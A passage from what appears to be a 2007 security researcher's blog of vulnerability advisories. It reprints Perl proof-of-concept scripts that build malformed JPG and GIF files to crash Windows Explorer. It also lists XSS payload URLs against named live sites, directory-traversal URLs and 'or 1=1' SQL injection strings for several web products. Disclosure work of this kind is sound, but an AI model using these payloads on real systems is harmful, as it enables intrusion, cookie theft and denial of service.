src="http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_WMF.GIF" height="250" width="400"></a><br><strong>Click To full size</strong><br /><br />filemon mark the overflow in 'FileAllInformation()' function.<br /><br />another test with the same file :<br /><br />save EFA_test.vbs and execute it , the windows scripting host <br />crash wen try to look extended attribute number 9 (Author).<br /><br />delete the doc file in a dos command line :)<br /><br />####################<br />Exploit jpg file<br />####################<br /><br />Download BID 25207 exploit and unzip it in c:\test<br /><br />open filemon and include process explorer.exe<br />and click in apply.<br />now open c:\test\ and wen explorer looks the EFA for the jpg<br />file , crash , or wen put the mouse over...<br /><br />in the filemon wen the crash is done we have some similar to <br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_jpg.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_jpg.GIF" height="250" width="400"></a><br><strong>Click To full size</strong><br /><br />filemon mark the overflow in 'FileAllInformation()' function.<br /><br />another test with the same file :<br /><br />save EFA_test.vbs and execute it , the windows scripting host <br />crash wen try to look extended attribute number 9 (Author).<br /><br />delete the doc file in a dos command line :)<br /><br />###################<br />exploit Gif file<br />###################<br /><br />save exploit for Gif file in c:\test<br /><br />open filemon and include process explorer.exe<br />and click in apply.<br />now open c:\test\ and wen explorer looks the EFA for the gif<br />file , crash , or wen put the mouse over...<br /><br />in the filemon wen the crash is done we have some similar to <br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_art.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_art.GIF" height="250" width="400"></a><br><strong>Click To full size</strong><br /><br />filemon mark the overflow in 'FileAllInformation()' function.<br /><br />another test with the same file :<br /><br />save EFA_test.vbs and execute it , the windows scripting host <br />crash wen try to look extended attribute number 9 (Author).<br /><br />delete the doc file in a dos command line :)<br /><br />###################<br />Exploit Doc file<br />###################<br /><br />unzip the explorer_crasher.doc in c:\test\<br />open filemon and include process explorer.exe<br />and click in apply.<br />now open c:\test\ and wen explorer looks the EFA for the doc <br />file , crash , or wen put the mouse over...<br /><br />in the filemon wen the crash is done filemon mark the<br /> overflow in 'FileAllInformation()' function.<br /><br />another test with the same file :<br /><br />save EFA_test.vbs and execute it , the windows scripting host <br />crash wen try to look extended attribute number 9 (Author).<br /><br />delete the doc file in a dos command line :)<br />#################################<br />LINKS AND FILES NEEDED<br />#################################<br /><br />For testing this you need all exploits , filemon and EFA.vbs.<br /><br />Download filemon :<br /><br />http://www.microsoft.com/technet/<br />sysinternals/FileAndDisk/Filemon.mspx<br /><br />Download Exploit Word file DoS :<br /><br />http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar<br /><br />Download exploit BID 16167:<br /><br />http://www.securityfocus.com/data/<br />vulnerabilities/exploits/WMF-DoS.rar<br /><br />Exploit BID 25207 :<br />########################################################<br />#!/usr/bin/perl<br /><br />#Bug found and ExpLoitEd by CrazyAngel<br /># Greets: st0rke, Elite, P0uya_s3rv3r, Aria<br /># ThnX ALL Shabgard.Org Members Specially Moderators and Clans<br /><br />print "\nJPG PoC denial of service exploit by CrazyAngel ";<br />print "\n\ngenerating something.jpg...";<br />open(JPG, ">./something.jpg") or die "cannot create jpg file\n";<br />print JPG "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x72\x65\x7A\x61\x2E\x65";<br />print JPG "\x78\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";<br />print JPG "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";<br />print JPG "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";<br />print JPG "\x00\x00\x00\x00";<br />close(JPG);<br />print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";<br /><br />##########################################################<br /><br /><br />Save Gif file gdi32.dll DoS :<br /><br />##########################################################<br />#!/usr/bin/perl<br />##########################################################<br /># Bug Found By ::DeltahackingTEAM<br />##<br /># Coded By Reza.Yavari (Dr.Pantagon)<br />##<br />#Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com<br />##<br />#Free Upload :: Www.Persianupload.com And Www.Persianupload.net<br />##<br />#Email: Dr.Pantagon [A]Deltasecurity.ir<br />##<br /># We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem<br /><br />print "\nGIF PoC denial of service exploit by Dr.Pantagon < Dr.Pantagon@deltasecurity.ir>";<br />print "\n\ngenerating Art.gif...";<br />print "\n\nUsage :";<br />print "\n\n1- Mouse Over Art.gif For Excute Exploit ";<br />print "\n\n2- Single Click Art.gif For Excute Exploit ";<br />print "\n\n3- Double Clik Art.gif (Open) For Excute Exploit ";<br />print "\n\n4- More... ";<br />print "\n\nYou Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit";<br />open(gif, ">./Art.gif") or die "cannot create gif file\n";<br />print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";<br />print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";<br />print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";<br />print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";<br />print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";<br />print gif "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";<br />print gif "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99";<br />print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";<br />print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";<br />print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";<br />print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";<br />print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";<br />print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";<br />print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";<br />print gif "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99";<br />print gif "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";<br />print gif "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";<br />print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";<br />print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";<br />print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";<br />print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";<br />print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";<br />close(gif);<br />print "ok\n\nok Gif Exploit Creat and run exploit and wait :)\n";<br /><br /># milw0rm.com [2007-07-23]<br />########################################################<br /><br />Save EFA_test.vbs:<br /><br />#######################<br />EFA_test.vbs<br />########################<br /><br />Dim arrHeaders(35)<br />Set objShell = CreateObject("Shell.Application")<br />Set objFolder = objShell.Namespace("C:\test")<br />For i = 0 to 34<br />arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)<br />Next<br />For Each strFileName in objFolder.Items<br />For i = 0 to 34<br />Wscript.Echo i & vbtab & arrHeaders(i) _<br />& ": " & objFolder.GetDetailsOf(strFileName, i)<br />Next<br />Next<br />#########################################################<br /><br />######################## €nd ######################### <br /><br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro Hi is investigate and documented with me this issue.<br />Thnx to Icaro and Badchecksum Team for interesting in research.<br />Thnx To Jkouns and Jericho for his patience.<br />Thnx to All osvdb Maglers they are involved in a very nice project.<br />Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers<br />Thnx to All Lostmon´s Group Team<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-25783253750920997392007-08-07T05:45:00.000-07:002007-08-07T05:57:21.403-07:00Google custom search engine contributors invite XSS#####################################################<br />Google custom search engine contributors invite XSS<br />Vendor url: http://www.google.com<br />Product Url: http://www.google.com/coop/cse/<br />Advisore url:http://lostmon.blogspot.com/2007/08/<br />google-custom-search-engine.html<br />Vendor notify :yes vendor confirmed: yes Fixed: YES<br />#####################################################<br /><br />Description:<br /><br />A Custom Search Engine is a tailored search experience,<br />built using Google's core search technology, which <br />prioritizes or restricts search results based on websites<br />and pages that you specify, and which can be tailored to<br />reflect your point of view or area of expertise. <br /><br />Google Custom search Engine have a flaw that allows a remote<br />cross site scripting attack.This flaw exists because the <br />application does not validate The texarea in the wen preview<br />a invite.This could allow a user to create a specially<br />invite that would execute arbitrary code in a user's browser<br />within the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br />################<br />timeline<br />###############<br /><br />discovered: 31-07-2007<br />vendor notifY 31-07-2007<br />vendor response:31-07-2007<br />vendor fix:07-08-2007 (i test it today)<br />disclosure:07-08-2007<br /><br />####################<br />explanation<br />###################<br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/Google_custom_search_engine.jpg" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/xss/images/Google_custom_search_engine.jpg" height="250" width="400"></a><br /><br />Go to <br /><br />http://www.google.com/coop/manage/cse/collaboration?cx=[tokem-of search engine]<br /><br />and in 'Add a personal note to the invitation' write some javascript<br />or html code and them click on 'invite preview'<br />this code is execute...<br /><br />Also the form convert to hexa with semicoloms to html :<br /><br /><br />it works transform to html code , but it does not execute it :)<br /><br />we can try to convert it in decimal values and it show too the<br />html without execute it.<br />Only works with 'simple' html<br /><br />######################### €nd ########################<br /><br />Thnx To estrella To be my ligth<br />Thnx to all Lostmon Team !!<br /><br />-<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-33696443307172481072007-08-06T02:07:00.000-07:002007-10-25T12:28:18.157-07:00Orange.es Starmedia y latinchat vulnerables#################################################<br />Orange.es Starmedia y latinchat vulnerables a <br />ataques de tipo Cross-site Scripting.<br />Articulo original:http://lostmon.blogspot.com/<br />2007/08/orangees-starmedia-y-latinchat.html<br />#################################################<br /><br />Hace varios dias que intente ponerme en contacto<br />con el webmaster tanto de starmedia ,orange para <br />notificarles una serie de vulnerabilidades en sus<br />paginas.Hasta tres correos en diferentes fechas sin <br />Obtener ninguna respuesta por parte del grupo.<br /><br />Estas paginas , estan afectadas por una vulnerabilidad<br />llamada Cross site scripting,Atraves de la cual se puede<br />ejecutar codigo html o javascript en el contexto de seguridad<br />entre el servidor y el usuario cliente.<br /><br />Asi pues si visitais estas paginas y usais sus servicios<br />ir con cuidado y comprobar las URL que visitais de las mismas<br />y que no haya nada extraño en ellas.<br /><br /><br />###################################<br />Sobre el dominio:*.orange.es<br />###################################<br /><br />http://busca.orange.es/search?buscar=crucero&first=<br />&destino=imagen&filtrofamiliar=Desactivado"><script><br />alert()</script>&xargs=&estat= <br /><br />http://busca.orange.es/search?buscar=crucero&first=<br />&destino=imagen"><script>alert()</script><br />&filtrofamiliar=Desactivado&xargs="&estat=<br /><br />http://busca.orange.es/search?buscar=crucero&first=<br />&destino=imagen&filtrofamiliar=Desactivado&xargs="><br /><script>alert()</script>&estat=<br /><br />http://busca.orange.es/search?buscar=crucero&first=<br />&destino=imagen&filtrofamiliar=Desactivado&xargs=&estat=<br />"><script>alert()</script><br /><br />http://busca.orange.es/search?buscar="><script>alert()</script><br />&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=<br /><br /><br />http://busca.orange.es/search?buscar=todo+spice+girls<br />&first=&rbpref=pref&destino=web&filtrofamiliar=Activado<br />"><script>alert()</script>&xargs=&estat=<br /><br />Todas las variables de la siguiente url estan afectadas<br />menos la y , la x , la rbpref y slanguage.<br /><br /><br />http://busca.orange.es/search?buscar=sss&iall=1&exact=zzz&<br />iexact=1&any=zzzz&iany=1&none="><script>alert()</script>&<br />inone=1&date=3&pais=latinamerica&format=&domain=&domain_pers<br />=&slanguage=&rbpref=advanced&lang=&x=44&y=13<br /><br />http://cine.orange.es/buscador/contenidos.html?&text=<br />%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E<br /><br />http://cine.orange.es/encuestas/encuestas.html?id=3801<br />"><script>alert()</script><br /><br /><br />http://foros.orange.es/forosw/servlet/buscarForos?query=<br />"><script>alert()</script><br /><br /><br />http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=<br />347&id=1726385&re="><script>alert()</script><br /><br />http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=<br />347&id=1726385"><script>alert()</script>&re=blah<br /><br /><br />http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=415<br />"><script>alert()</script> // sin estar logeado.<br /><br />http://tonosdeespera.orange.es/RingBackTones/servlet/web/<br />TonosCategoria?identificador=5117154&TitCat=Pop+Rock+<br />Internacional"><script>alert()</script><br /><br />http://personales.orange.es/orange/site/siteBuscador?<br />palabras="><script>alert()</script><br />&idcategoria=#busquedas<br /><br /><br />###################################<br />En sus Chats.<br />###################################<br /><br />se puede llamar a una ventana de privado sin estar en el chat:<br />y ademas el parametro username de usuario al que abrimos el <br />privado es tambien vulnerable:<br /><br />http://disp011-org.orange.es/magma_qa/templates/T12/<br />0/privat.html?<br />UserName=Lostmon"><script>alert()</script><br /><br />http://dhtml.orange.es/magma_qa/templates/T12/R0/<br />showlogin.html?TEMPLATE=12&CLIENT=JAVA&area=G32&<br />InstanceID=R32_7-1&UserName=Lostmon<br /><br />ademas las cajas para introducir texto para enviar al canal o <br />la caja de mensage a enviar en el privado tambien permite el<br /> envio de codigo XSS esperimentando,con los chats , tal vez <br />sea asi mismo posible enviar codigo XSS a los demas usuarios<br /> ( no lo he probado)<br /><br /><br />############################<br />Starmedia<br />##########################<br /><br />como puede verse en la siguiente url , el caso es el mismo<br />que en el dominio orange.es.<br /><br />La estructura web sigue el mismo patron <br />con lo cual podemos pensar que es el mismo tipo de sistema<br /><br />y posee las mismas vulnerabilidades ( y asi es ).<br /><br />http://busca.starmedia.com/search?buscar="><script>alert()</script><br />&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=<br /><br />tabien esta afectado de la misma manera y al ser el mismo tipo de <br />sistema en el chat (latinchat)<br />tambien posee las mismas vulnerabilidades.<br /><br /><img src="http://usuarios.lycos.es/reyfuss/xss/images/latinchat.gif" height="250" width="400"><br /><br />http://login04.latinchat.com/magma_qa/templates/modules/<br />result/T2.php?UserName=Lostmon"><script><br />alert()</script>&InstanceID=R31_1-1<br /><br />##################### €nd ##############################<br /><br />Thnxs To estrella to be my ligth<br />Thnx to all Lostmon team !<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-91062697403254769102007-08-03T04:07:00.000-07:002007-08-03T13:58:25.296-07:00Crashing Safari 3.0.3 for Windows Step by StepA few days a go i Publish in my blog ,a guide ,<br />about how to crash safari 3.0.2 step by step. <br /><br /><br /><a href="http://lostmon.blogspot.com/2007/07/crashing-safari-302-for-windows-step-by.html" target="_BLANK">http://lostmon.blogspot.com/2007/07/<br />crashing-safari-302-for-windows-step-by.html</a><br /><br />Apple prevent to fix in the next version or release, but today i test <br />safari for windows 3.0.3 and this flaw <br />continue exist in this version too :(( <br /><br />Other crash could be done wen try to print any document ,in safari 3.0.3 <br /><br />-- <br />atentamente: <br />Lostmon (lost...@gmail.com) <br />Web-Blog: http://lostmon.blogspot.com/ <br />Google group: http://groups.google.com/group/lostmon (new) <br /><br /><br />-- <br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-22087645193486879252007-07-25T06:18:00.000-07:002007-07-30T04:38:40.372-07:00ifoto traversal folder enumeration#################################################<br />ifoto traversal folder enumeration<br />Vendor url:http://ifoto.ireans.com/<br />Advisore:http://lostmon.blogspot.com/2007/07/<br />ifoto-traversal-folder-enumeration.html<br />vendor notify:no exploit include:yes<br />Secunia:<a href="http://secunia.com/advisories/26186/" target="_BLANK">SA26186</a><br />BID:<a href="http://www.securityfocus.com/bid/25065" target="_BLANK">25065</a><br />SecWatch: <a href="http://secwatch.org/advisories/1018593/" Target="_BLANK">SWID1018593</a><br />#################################################<br /><br /><br />ifoto contains a flaw that allows a remote traversal<br />arbitrary folder enumeration.This flaw exists because the<br />application does not validate 'dir' variable upon submission<br />to 'index.php' scripts.This could allow a remote users to<br />create a specially crafted URL that would execute '../' <br />directory traversal characters to view folder<br />structure on the target system with the privileges<br />of the target web service.<br /><br /><br /><br />################<br />versions<br />################<br /><br />ifoto 1.0<br /><br /><br />################<br />Solution:<br />################<br /><br />No solution was available at this time !!!<br /><br />################<br />TimeLine<br />################<br /><br />Discovered: 18-07-2007<br />vendor notify:--- <br />vendor response:---<br />disclosure:25-07-2007<br /><br /><br />#####################<br />Examples<br />#####################<br /><br /><br />http://[victims]/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc<br />http://[victims]/ifoto/?dir=../../../../../../etc<br />http://[victims]/ifoto/index.php?dir=../../../../../../<br /><br /><br />################# €nd ############################<br /><br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-19951543904135045902007-07-25T01:54:00.000-07:002007-07-26T01:18:36.113-07:00Vikingboard multiple Cross site scripting#################################################<br />Vikingboard multiple Cross site scripting<br />Vendor url: http://vikingboard.com/<br />advisore:http://lostmon.blogspot.com/2007/07/<br />vikingboard-multiple-cross-site.html<br />vendor notify:yes exploit include:yes<br />Secunia:<a href="http://secunia.com/advisories/26196/" target="_BLANK">SA26196</a><br />BID:<a href="http://www.securityfocus.com/bid/25056" target="_BLANK">25056</a><br />SecWatch:<a href="http://secwatch.org/advisories/1018567/" target="_BLANK">SWID1018567</a><br />#################################################<br /><br /><br />Vikingboard is a PHP-based community board designed by<br />the principle of “less is more”, and features a powerful<br />web-based extension-system, a lighting-fast cache system<br />and dynamic web update. Small, but incredibly fast and powerful.<br /><br /><br /><br />Vikingboard contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does<br />not validate multiple params upon submission to multiple scripts<br />.This could allow a user to create a specially crafted URL that<br />would execute arbitrary code in a user's browser within the<br />trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br /><br />################<br />versions<br />################<br /><br />Vikingboard 0.1.2<br /><br /><br />################<br />Solution:<br />################<br /><br />No solution was available at this time !!!<br /><br />################<br />TimeLine<br />################<br /><br />Discovered: 20-07-2007<br />vendor notify: 25-07-2007<br />vendor response:<br />disclosure:25-07-2007<br /><br /><br />#####################<br />Examples<br />#####################<br /><br /><br />http://localhost/viking/cp.php?mode=9&id=2[XSS-CODE]<br />http://localhost/viking/cp.php?mode=7&f=1[XSS-CODE]<br />http://localhost/viking/cp.php?mode=6"e=1[XSS-CODE]<br />http://localhost/viking/cp.php?mode=12&act=[XSS-CODE]<br /><br />http://localhost/viking/user.php?u=2[XSS-CODE]<br />http://localhost/viking/help.php?act=guidelines[XSS-CODE]<br /><br /><br />we can call the debug parameter to obtain sensitive information.<br /><br /><br />http://localhost/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0<br /><br />wen send a private message the field "Message Title " is affected<br /><br />http://localhost/viking/cp.php?mode=6<br /><br />we can send a PM with a malformed XSS title to others users<br />and it is executed wen the vicims go to Inbox on his control panel <br /><br />http://localhost/viking/cp.php?mode=7&f=1<br /><br />http://localhost/viking/report.php?p=2[XSS-CODE]<br /><br /><br />http://localhost/viking/topic.php?t=2&s=0[XSS-CODE]<br /><br />http://localhost/viking/post.php?mode=03&t=2"e=2[XSS-CODE]<br />http://localhost/viking/post.php?mode=03&t=2[XSS-CODE]"e=2<br />http://localhost/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]<br /><br />http://localhost/viking/post.php?mode=02&p=2[XSS-CODE]<br /><br />http://localhost/viking/search.php?search=user:administrator&act=dosearch<br /><br />if the user has any script code in the first lines of any post<br />wen try fo find all post by this user , and wen the applications<br />show the results it is executed<br /><br />##################### €nd ##############################<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-48362572566489800882007-07-25T01:40:00.000-07:002007-07-25T01:58:50.521-07:00Vikingboard debug information disclosure#################################################<br />Vikingboard debug information disclosure<br />Vendor url:http://vikingboard.com/<br />Advisore:http://lostmon.blogspot.com/2007/07/<br />vikingboard-debug-information.html<br />vendor notify:yes exploit include:yes<br />#################################################<br /><br /><br />Vikingboard is a PHP-based community board designed by<br />the principle of “less is more”, and features a powerful<br />web-based extension-system, a lighting-fast cache system<br />and dynamic web update. Small, but incredibly fast and powerful.<br /><br /><br /><br />Vikingboard has a weakness, which can be exploited by malicious<br />people to disclose some system information.<br /><br />The weakness is caused due to a design error where debug <br />information can be disclosed by specifying the "debug" parameter.<br /><br /><br /><br />################<br />versions<br />################<br /><br />Vikingboard 0.1.2<br /><br /><br />################<br />Solution:<br />################<br /><br />No solution was available at this time !!!<br /><br />################<br />TimeLine<br />################<br /><br />Discovered: 20-07-2007<br />vendor notify: 25-07-2007<br />vendor response:<br />disclosure: 25-07-2007<br /><br /><br />#####################<br />Examples<br />#####################<br /><br /><br />http://localhost/viking/forum.php?f=1&debug=1<br />http://localhost/viking/cp.php?mode=10&debug=1<br />http://localhost/viking/cp.php?&debug=1<br /><br />################# €nd ############################<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-83919151212904422432007-07-22T10:41:00.000-07:002007-07-25T02:07:04.241-07:00AlstraSoft Multiple products multiple Vulnerabilities####################################################<br />AlstraSoft Multiple products multiple Vulnerabilities<br />Vendor urL:http://www.alstrasoft.com/products.htm<br />Advisore url:http://lostmon.blogspot.com/2007/07/<br />alstrasoft-multiple-products-multiple.html<br />Vendor notify:yes (webform) Exploit included: yes<br />BID:<a href="http://www.securityfocus.com/bid/25022" target="_BLANK">25022</a>, <a href="http://www.securityfocus.com/bid/25023" target="_BLANK">25023</a>, <a href="http://www.securityfocus.com/bid/25026" target="_BLANK">25026</a><br />####################################################<br /><br /><br /><br />Multiple products of Alstrasoft Are prone vulnerables<br />to Cross site scripting and SQL injections style attacks<br /><br /><br /><br />################<br />examples<br />################<br /><br />For exploit some flaws you need to login<br /><br />#####################################<br />AlstraSoft Video Share Enterprise<br />#####################################<br /><br /><br />http://[Victim]/videoshare/view_video.php?viewkey=<br />9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+<br />sent+"><script>alert()</script><br /><br />http://[Victim]/videoshare/view_video.php?viewkey=<br />9c1d0e3b9ccc3ab651bc&page=10"><script>alert()<br /></script>&viewtype=&category=mr<br /><br />http://[Victim]/videoshare/view_video.php?viewkey=<br />9c1d0e3b9ccc3ab651bc"><script>alert()</script><br /><br />http://[Victim]/videoshare/signup.php?<br />next=upload"><script>alert()</script><br /><br />http://[Victim]/videoshare/search_result.php?<br />search_id=ghgdgdfd"><script>alert()</script><br /><br />http://[Victim]/videoshare/view_video.php?<br />viewkey=d9607ee5a9d336962c53&page=1&viewtype="><script><br />alert(document.cookie)</script>&category=mr<br /><br />http://[Victim]/videoshare/video.php?<br />category=tf"><script>alert()</script>&viewtype=<br /><br />http://[Victim]/videoshare/video.php?<br />page=5"><script>alert()</script><br /><br />http://[Victim]/videoshare/compose.php?<br />receiver=demo"><script>alert()</script><br /><br />http://[Victim]/videoshare/groups.php?<br />b=ra&catgy=Recently%20Added"><script>alert()</script><br /><br /><br />http://[Victim]/videoshare/siteadmin/<br />channels.php?a=Search&channelid=&channelname=%22<br />%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search<br /><br />http://[Victim]/videoshare/siteadmin/muser.php?<br />email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script><br /><br /><br />path disclosure:<br /><br />http://[Victim]/videoshare/uprofile.php?<br />UID=53"><script>alert()</script><br /><br />http://[Victim]/videoshare/channel_detail.php?<br />chid=24"><script>alert()</script><br /><br />http://[Victim]/videoshare/uvideos.php?UID=53<br />"><script>alert()</script><br /><br />http://[Victim]/videoshare/view_video.php?<br />viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'<br /><br />http://[Victim]/videoshare/groups_home.php?urlkey=<br />RSL"><script>alert()</script><br /><br />http://[Victim]/videoshare/ufriends.php?UID=253<br />"><script>alert()</script><br /><br />SQL injection :<br /><br />http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1<br /><br />http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1<br />http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1<br />http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1<br />http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public<br />http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private<br />http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1<br />http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1<br />http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1<br />http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1<br /><br /><br /><br />###########################################<br />AlstraSoft Text Ads Enterprise<br />###########################################<br /><br />http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script><br /><br />http://[Victim]/ads/search_results.php?query="><script>alert()</script><br /><br />http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script><br /><br />http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script><br /><br /><br />#########################################<br />AlstraSoft SMS Text Messaging Enterprise<br />########################################<br /><br /><br />http://[Victim]/admin/membersearch.php?pagina=17&q=<br />la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E<br /><br />http://[Victim]/admin/edituser.php?userid=<br />Walltrapas"><script>alert()</script><br /><br />http://[Victim]/admin/membersearch.php?<br />q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit<br /><br /><br />#################################################<br />e-friends<br /><br />http://alstrahost.com/friends/index.php?mode=<br />people_card&p_id=927"><script>alert()</script> <br /><br />this is a persistent XSS<br /><br /><br />########################################<br />AlstraSoft Affiliate Network Pro<br />########################################<br /><br />http://[Victim]/affiliate/merchants/index.php?<br />Act=programedit&mode=edit&id=42"><script>alert()</script><br /><br />http://[Victim]/affiliate/merchants/index.php?Act=<br 